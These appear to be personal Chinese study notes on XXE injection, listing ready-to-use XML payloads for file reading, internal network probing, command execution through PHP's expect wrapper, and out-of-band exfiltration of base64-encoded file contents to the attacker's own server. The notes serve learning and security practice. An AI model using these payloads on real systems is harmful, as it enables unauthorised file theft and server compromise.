每周学习总结链接

我记得之前有一个关卡是这个漏洞，但是我忘了

一、XXE 漏洞

XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。

在实际中我们可能不知道怎么发现这个漏洞，其实很简单只需要抓个包看看数据的样式是不是 XML 语法即可

二、XML 的学习

对于这个实在没有讲的，你要是这个都不会，我对你的能力表示怀疑

三、DTD

这个我之前学开发的时候，没有见过，建议看看，
文章链接

四、攻击思路

1. 读文件

   <?xml version = "1.0"?>
   <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///d://test.txt"> ]>
   <x>&xxe;</x>
   

2. 内网探针或攻击内网应用（触发漏洞地址）

   <?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt" > ]>
   <x>&rabbit;</x>
   

3. RCE 该 CASE 是在安装 expect 扩展的 PHP 环境里执行系统命令

   <?xml version = "1.0"?>
   <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "expect://id" > ]>
   <x>&xxe;</x>
   

4. 引入外部实体 dtd

   <?xml version="1.0" ?>
   <!DOCTYPE test [ <!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd"> %file; ]>
   <x>&send;</x>
   
   evil2.dtd:
   <!ENTITY send SYSTEM "file:///d:/test.txt">
   

5. 无回显–读取文件

   <?xml version="1.0"?>
   <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=test.txt"> <!ENTITY % dtd SYSTEM "http://远程:8081/test.dtd"> %dtd; %send; ]>
   
   

6. 在自己服务器上创建相应文件，使目标服务器访问自己服务器，从日志查看信息
   test.dtd：

   <!ENTITY % payload
    "<!ENTITY &#x25; send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>"
   >
   %payload;
   

7. 协议-读文件（绕过）

   <?xml version = "1.0"?>
       <!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>
   <x>&f;</x>
   

总结

参考文章